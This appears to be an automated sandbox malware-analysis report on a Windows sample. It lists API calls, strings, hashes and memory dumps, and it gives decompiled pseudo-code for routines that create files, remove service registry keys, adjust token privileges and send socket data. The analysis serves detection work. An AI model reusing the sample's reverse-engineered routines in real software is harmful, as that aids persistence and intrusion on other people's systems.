                                                                                                        • __EH_prolog3.LIBCMT ref: 004C8512
                                                                                                        • GetCurrentThread.KERNEL32 ref: 004C855A
                                                                                                        • GetLastError.KERNEL32 ref: 004C858A
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 004C87D5
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004C87FC
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004C88C4
                                                                                                        • GetLastError.KERNEL32 ref: 004C88E0
                                                                                                          • Part of subcall function 004A2E7D: __EH_prolog3.LIBCMT ref: 004A2E84
                                                                                                          • Part of subcall function 0040E968: __EH_prolog3.LIBCMT ref: 0040E96F
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004C8989
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004C8A26
                                                                                                        Strings
                                                                                                        • process_tools.SetTokenPrivilege: AdjustTokenPrivileges failed for privilege , xrefs: 004C89C2
                                                                                                        • . Using process token., xrefs: 004C8634
                                                                                                        • ' not found, xrefs: 004C88F9
                                                                                                        • process_tools.SetTokenPrivilege: Privilege ', xrefs: 004C891E
                                                                                                        • with error , xrefs: 004C89A0
                                                                                                        • process_tools.SetTokenPrivilege: OpenThreadToken for privilege , xrefs: 004C8684, 004C8835
                                                                                                        • process_tools.SetTokenPrivilege: LookupPrivilegeValue for privilege , xrefs: 004C8A5B
                                                                                                        • failed with error , xrefs: 004C865C, 004C8813, 004C8A39
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$H_prolog3$Current$CloseCriticalDeleteHandleProcessSectionThread
                                                                                                        • String ID: failed with error $ with error $' not found$. Using process token.$process_tools.SetTokenPrivilege: AdjustTokenPrivileges failed for privilege $process_tools.SetTokenPrivilege: LookupPrivilegeValue for privilege $process_tools.SetTokenPrivilege: OpenThreadToken for privilege $process_tools.SetTokenPrivilege: Privilege '
                                                                                                        • API String ID: 507264954-360949472
                                                                                                        • Opcode ID: 1a4df34a5f5f679b58960d0fdfad68fde965185ff92667bb50617743d281c121
                                                                                                        • Instruction ID: 3dbb8db9447217885d83a8932ecef01bed5cd9d2b57d8fc73de6323039766bf2
                                                                                                        • Opcode Fuzzy Hash: 1a4df34a5f5f679b58960d0fdfad68fde965185ff92667bb50617743d281c121
                                                                                                        • Instruction Fuzzy Hash: 7A029E7180418CEAEB15EBA4CD95FED7B78AF25308F04819EF44627192EB785F08DB25
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70981100, Relevance: 28.7, APIs: 19, Instructions: 154memoryfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 76%
                                                                                                        			E70981100(intOrPtr _a4, intOrPtr _a8) {
				short _v528;
				short _v536;
				short _v1044;
				short _v1052;
				long _v1056;
				short _v1060;
				intOrPtr _t24;
				WCHAR* _t40;
				void* _t43;
				WCHAR* _t48;
				void* _t54;
				intOrPtr _t69;
				void* _t72;
				void* _t79;

				_t24 = _a4;
				_v1056 = 0;
				if(_t24 != 2) {
					if(_t24 != 3) {
						goto L15;
					} else {
						CloseHandle( *(_a8 + 0x14));
						return 1;
					}
				} else {
					_t75 = _a8;
					_v1052 =  *(_a8 + 0x10);
					_t79 = E7098A810( *((intOrPtr*)( *(_a8 + 0x10) + 4)), 0, 0);
					if(_t79 != 0) {
						_t72 = E7098A810( *((intOrPtr*)(_t75 + 4)), ( *(_t75 + 0x1c) & 0x0000ffff) >> 0x00000007 & 0x00000001, 0);
						if(_t72 != 0) {
							wsprintfW( &_v1052, StrChrW(0x7098c470, 0x5c));
							PathRemoveFileSpecW( &_v1044);
							PathAddBackslashW( &_v1044);
							_t40 =  &_v1044;
							__imp__SHCreateDirectoryExW(0, _t40, 0, _t79, _t72, _t54);
							if(_t40 == 0 || _t40 == 0x50 || _t40 == 0xb7) {
								_push(_t72);
								_push(_t79);
								wsprintfW( &_v1060, StrChrW(0x7098c470, 0x5c));
								_t43 = CreateFileW( &_v1052, 0xc0000000, 0, 0, 4, 0x80, 0);
								if(_t43 != 0xffffffff) {
									L11:
									_v1060 = _t43;
								} else {
									if( *_v1056 != 0 && GetFileAttributesW( &_v1052) != 0xffffffff) {
										_t48 = StrChrW(0x7098c464, 0x2e);
										_t69 =  *0x7098f2a0; // 0x0
										_push(_t48);
										_push(_t69);
										_push(0x2e);
										_push( &_v1056);
										wsprintfW( &_v536, StrChrW(0x7098c44c, 0x25));
										if(MoveFileExW( &_v1052,  &_v528, 0) != 0) {
											_t43 = CreateFileW( &_v1052, 0xc0000000, 0, 0, 4, 0x80, 0);
											if(_t43 != 0xffffffff) {
												goto L11;
											}
										}
									}
								}
							}
							HeapFree(GetProcessHeap(), 0, _t72);
						}
						HeapFree(GetProcessHeap(), 0, _t79);
					}
					L15:
					return _v1056;
				}
			}

















                                                                                                        0x70981106
                                                                                                        0x7098110d
                                                                                                        0x70981117
                                                                                                        0x709812bb
                                                                                                        0x00000000
                                                                                                        0x709812bd
                                                                                                        0x709812c8
                                                                                                        0x709812d9
                                                                                                        0x709812d9
                                                                                                        0x7098111d
                                                                                                        0x7098111f
                                                                                                        0x7098112b
                                                                                                        0x7098113a
                                                                                                        0x70981141
                                                                                                        0x7098115e
                                                                                                        0x70981165
                                                                                                        0x70981189
                                                                                                        0x70981193
                                                                                                        0x7098119e
                                                                                                        0x709811a6
                                                                                                        0x709811ad
                                                                                                        0x709811b5
                                                                                                        0x709811c7
                                                                                                        0x709811c8
                                                                                                        0x709811d8
                                                                                                        0x709811f4
                                                                                                        0x709811fd
                                                                                                        0x70981286
                                                                                                        0x70981286
                                                                                                        0x70981203
                                                                                                        0x7098120a
                                                                                                        0x70981223
                                                                                                        0x70981225
                                                                                                        0x7098122b
                                                                                                        0x7098122c
                                                                                                        0x7098122d
                                                                                                        0x70981233
                                                                                                        0x70981246
                                                                                                        0x70981262
                                                                                                        0x7098127b
                                                                                                        0x70981284
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70981284
                                                                                                        0x70981262
                                                                                                        0x7098120a
                                                                                                        0x709811fd
                                                                                                        0x70981294
                                                                                                        0x7098129a
                                                                                                        0x709812a5
                                                                                                        0x709812ab
                                                                                                        0x709812ae
                                                                                                        0x709812b7
                                                                                                        0x709812b7

                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(?), ref: 709812C8
                                                                                                          • Part of subcall function 7098A810: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,77E34620,00000100,74B04F20,00000000,70988E8F,00000000,00000000,00000000,4B7826AF,00000100), ref: 7098A82F
                                                                                                          • Part of subcall function 7098A810: GetProcessHeap.KERNEL32(00000008,00000002), ref: 7098A842
                                                                                                          • Part of subcall function 7098A810: HeapAlloc.KERNEL32(00000000), ref: 7098A849
                                                                                                          • Part of subcall function 7098A810: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 7098A859
                                                                                                        • StrChrW.SHLWAPI(7098C470,0000005C,00000000,00000000), ref: 7098117B
                                                                                                        • wsprintfW.USER32 ref: 70981189
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?), ref: 70981193
                                                                                                        • PathAddBackslashW.SHLWAPI(?), ref: 7098119E
                                                                                                        • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 709811AD
                                                                                                        • StrChrW.SHLWAPI(7098C470,0000005C,00000000,00000000), ref: 709811D0
                                                                                                        • wsprintfW.USER32 ref: 709811D8
                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 709811F4
                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 70981211
                                                                                                        • StrChrW.SHLWAPI(7098C464,0000002E), ref: 70981223
                                                                                                        • StrChrW.SHLWAPI(7098C44C,00000025,?,0000002E,00000000,00000000), ref: 7098123B
                                                                                                        • wsprintfW.USER32 ref: 70981246
                                                                                                        • MoveFileExW.KERNEL32(?,?,00000000), ref: 7098125A
                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 7098127B
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098128D
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70981294
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098129E
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709812A5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$File$CreateProcesswsprintf$ByteCharFreeMultiPathWide$AllocAttributesBackslashCloseDirectoryHandleMoveRemoveSpec
                                                                                                        • String ID:
                                                                                                        • API String ID: 452034401-0
                                                                                                        • Opcode ID: c2b6bc0fc6efc33b16da664e549fb77bf08db45624158960ee5880de9948e7fc
                                                                                                        • Instruction ID: 10ee21cea40d59e488998bd9c2ca43c7d3ee6b35072d8a423ac4311b94bbe9af
                                                                                                        • Opcode Fuzzy Hash: c2b6bc0fc6efc33b16da664e549fb77bf08db45624158960ee5880de9948e7fc
                                                                                                        • Instruction Fuzzy Hash: 7E41C6B2658300ABE3209BA1CC49F6F77ACEB88715F104A19F656D63D1DB74E444CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004FA79E, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 204sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CountTick$_strncmp$H_prolog3Sleep_memset_strlenioctlsocketselect
                                                                                                        • String ID: $
                                                                                                        • API String ID: 1920849741-1846248685
                                                                                                        • Opcode ID: cd726644872b4cd31f56c0a44b995a7e7fff80a8073c8eb56f0d424a9f2541df
                                                                                                        • Instruction ID: 907f7e7657ea471fb6a7299b6a9d2a4386095d1e68258f24096403a28a1d6dfd
                                                                                                        • Opcode Fuzzy Hash: cd726644872b4cd31f56c0a44b995a7e7fff80a8073c8eb56f0d424a9f2541df
                                                                                                        • Instruction Fuzzy Hash: 467192B090020AAFDF10EF64CC85DFE7F70FF04355B10452AE9199B2A1D7789A55CB5A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709843A0, Relevance: 27.1, APIs: 18, Instructions: 108registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 50%
                                                                                                        			E709843A0() {
				short _v528;
				short _v532;
				short _v536;
				short _v540;
				short _v544;
				void* _t12;
				intOrPtr _t15;
				intOrPtr _t26;
				short* _t49;

				_t12 = E70983850(StrChrW(0x7098c90c, 0x55), 1);
				_t49 =  &(( &_v528)[4]);
				if(_t12 == 0) {
					return _t12;
				}
				if( *0x7098f5f4 != 0) {
					_push(0x7098c560);
					_push(0);
					_push(StrChrW(0x7098c8d0, 0x73));
					_t26 =  *0x7098f52c; // 0x748878
					_push(_t26);
					wsprintfW( &_v536, StrChrW(0x7098c824, 0x25));
					_t49 =  &(_t49[0xc]);
					_v532 = 0;
					if(RegCreateKeyExW(0x80000002,  &_v528, 0, 0, 0, 0xf023f, 0,  &_v532, 0) == 0) {
						RegDeleteValueW(_v536, StrChrW(0x7098c90c, 0x55));
						RegCloseKey(_v536);
					}
				}
				_push(StrChrW(0x7098c8e4, 0x55));
				_push(0x5c);
				_push(StrChrW(0x7098c8d0, 0x73));
				_t15 =  *0x7098f52c; // 0x748878
				_push(_t15);
				wsprintfW( &_v540, StrChrW(0x7098c824, 0x25));
				RegDeleteKeyW(0x80000002,  &_v532);
				_push(0x7098c560);
				_push(StrChrW(0x7098c90c, 0x55));
				_push(StrChrW(0x7098c780, 0x5c));
				wsprintfW( &_v544, StrChrW(0x7098c740, 0x53));
				return RegDeleteKeyW(0x80000002,  &_v536);
			}












                                                                                                        0x709843b9
                                                                                                        0x709843be
                                                                                                        0x709843c3
                                                                                                        0x709844d9
                                                                                                        0x709844d9
                                                                                                        0x709843d8
                                                                                                        0x709843da
                                                                                                        0x709843df
                                                                                                        0x709843ea
                                                                                                        0x709843eb
                                                                                                        0x709843f0
                                                                                                        0x70984400
                                                                                                        0x70984402
                                                                                                        0x70984423
                                                                                                        0x70984433
                                                                                                        0x70984444
                                                                                                        0x7098444f
                                                                                                        0x7098444f
                                                                                                        0x70984433
                                                                                                        0x7098445e
                                                                                                        0x7098445f
                                                                                                        0x7098446a
                                                                                                        0x7098446b
                                                                                                        0x70984470
                                                                                                        0x70984480
                                                                                                        0x70984495
                                                                                                        0x70984497
                                                                                                        0x709844a5
                                                                                                        0x709844af
                                                                                                        0x709844bf
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,00000001), ref: 709843B6
                                                                                                          • Part of subcall function 70983850: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,750D2940,?,?,?,?,?,?,?,709843BE,00000000), ref: 70983869
                                                                                                          • Part of subcall function 70983850: OpenSCManagerW.ADVAPI32(00000000,00000000,00000001,?,?,?,?,?,?,?,709843BE,00000000), ref: 70983875
                                                                                                          • Part of subcall function 70983850: OpenServiceW.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,?,709843BE,00000000), ref: 7098388D
                                                                                                          • Part of subcall function 70983850: QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,709843BE,00000000), ref: 7098389F
                                                                                                          • Part of subcall function 70983850: ControlService.ADVAPI32(00000000,00000001,?), ref: 709838B4
                                                                                                          • Part of subcall function 70983850: QueryServiceStatus.ADVAPI32(00000000,?), ref: 709838CC
                                                                                                          • Part of subcall function 70983850: Sleep.KERNEL32(000003E8), ref: 709838DE
                                                                                                          • Part of subcall function 70983850: CloseServiceHandle.ADVAPI32(00000000), ref: 70983905
                                                                                                          • Part of subcall function 70983850: CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,709843BE,00000000), ref: 70983910
                                                                                                        • StrChrW.SHLWAPI(7098C8D0,00000073,00000000,7098C560), ref: 709843E8
                                                                                                        • StrChrW.SHLWAPI(7098C824,00000025,00748878,00000000), ref: 709843F8
                                                                                                        • wsprintfW.USER32 ref: 70984400
                                                                                                        • RegCreateKeyExW.ADVAPI32 ref: 7098442B
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055), ref: 7098443C
                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 70984444
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 7098444F
                                                                                                        • StrChrW.SHLWAPI(7098C8E4,00000055), ref: 7098445C
                                                                                                        • StrChrW.SHLWAPI(7098C8D0,00000073,0000005C,00000000), ref: 70984468
                                                                                                        • StrChrW.SHLWAPI(7098C824,00000025,00748878,00000000), ref: 70984478
                                                                                                        • wsprintfW.USER32 ref: 70984480
                                                                                                        • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 70984495
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,7098C560), ref: 709844A3
                                                                                                        • StrChrW.SHLWAPI(7098C780,0000005C,00000000), ref: 709844AD
                                                                                                        • StrChrW.SHLWAPI(7098C740,00000053,00000000), ref: 709844B7
                                                                                                        • wsprintfW.USER32 ref: 709844BF
                                                                                                        • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 709844CE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseDeleteOpenwsprintf$HandleManagerQueryStatus$ControlCreateSleepValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 2810420714-0
                                                                                                        • Opcode ID: 4f910abca14d63d61856c2d15b9e6bb9ee21f161857bd241c1d677fd7d7da664
                                                                                                        • Instruction ID: b97c84aa1e146fae7c3f8247b971f6cf3ea5b0c2051d6096ff1cadbd4b92b48e
                                                                                                        • Opcode Fuzzy Hash: 4f910abca14d63d61856c2d15b9e6bb9ee21f161857bd241c1d677fd7d7da664
                                                                                                        • Instruction Fuzzy Hash: 403186F27543047EF2209BA59C5EF6F7B9CDB84B15F104619FB44AA2C0E7B0A5048AB3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004C5619, Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 203COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 004C563B
                                                                                                        • _memset.LIBCMT ref: 004C5660
                                                                                                        • GetVersionExW.KERNEL32(00000000,?,?,000000A8), ref: 004C566F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3_catchVersion_memset
                                                                                                        • String ID: MC.isComm.0$MC.isComm.1$MC.isComm.DQuery.Failed: $MC.isComm.GetProc.Failed$MC.isComm.LoadLib.Failed$NetApiBufferFree$NetWkstaUserGetInfo$Netapi32.dll
                                                                                                        • API String ID: 1751856485-605090514
                                                                                                        • Opcode ID: 15171392b144a279079b5532fd256e8f31ce71c21175877ae0c756b7c2e1c9d9
                                                                                                        • Instruction ID: b988314c8f855af6d4c6c856e78e5bae139b399f43f535e92076c94569f55319
                                                                                                        • Opcode Fuzzy Hash: 15171392b144a279079b5532fd256e8f31ce71c21175877ae0c756b7c2e1c9d9
                                                                                                        • Instruction Fuzzy Hash: 3E71D774D05288EEDF10EBA5C946BEEBFB4AF55304F14406EE00167281D77C2B48DBA6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004FA4AB, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 236networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004FA4B2
                                                                                                        • select.WS2_32(00000002,00000000,00000001,00000000,?), ref: 004FA573
                                                                                                        • __WSAFDIsSet.WS2_32(?,00000001), ref: 004FA591
                                                                                                        • send.WS2_32(?,?,?,00000000), ref: 004FA5A7
                                                                                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,004FF44D,00000000,00000000,00000000,00000001,000003E8,00000000,0000000C,004DC531), ref: 004FA5B4
                                                                                                        • shutdown.WS2_32(?,00000001), ref: 004FA5EC
                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                          • Part of subcall function 004F9BD8: __EH_prolog3.LIBCMT ref: 004F9BDF
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004D6BAE: __EH_prolog3.LIBCMT ref: 004D6BB5
                                                                                                        • shutdown.WS2_32(?,00000001), ref: 004FA6CF
                                                                                                        • shutdown.WS2_32(?,00000001), ref: 004FA6DE
                                                                                                          • Part of subcall function 004BEF63: __EH_prolog3.LIBCMT ref: 004BEF6A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$shutdown$CriticalSection$DeleteErrorInitializeLastselectsend
                                                                                                        • String ID: NC.WriteData.Failed1$ NC.WriteData.Failed3$ NC.WriteData.Failed4$ NC.WriteData.Failed5$writeData.Disconnect$writeData.Error.
                                                                                                        • API String ID: 2406434119-2506857550
                                                                                                        • Opcode ID: 95dc11b5f6a6b1c5da883357649ec516123e8847b9c6a29a47f818fd0f559cea
                                                                                                        • Instruction ID: 9b8cd641ee854a4557a035298ed64e4ee21aab65bacbfc74d2b882a06588e5f0
                                                                                                        • Opcode Fuzzy Hash: 95dc11b5f6a6b1c5da883357649ec516123e8847b9c6a29a47f818fd0f559cea
                                                                                                        • Instruction Fuzzy Hash: 8C91DCB090020DEFEF10EFA4C8859EE7BB5BF54344F24805EE645AB290D7399E14CB66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004B94E7, Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 185COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004B94F5
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                          • Part of subcall function 004B91EF: _memset.LIBCMT ref: 004B9216
                                                                                                          • Part of subcall function 004B91EF: GetVersionExW.KERNEL32(?,?,00000001), ref: 004B9231
                                                                                                          • Part of subcall function 004B91EF: GetVersionExW.KERNEL32(?,?,00000001), ref: 004B9248
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
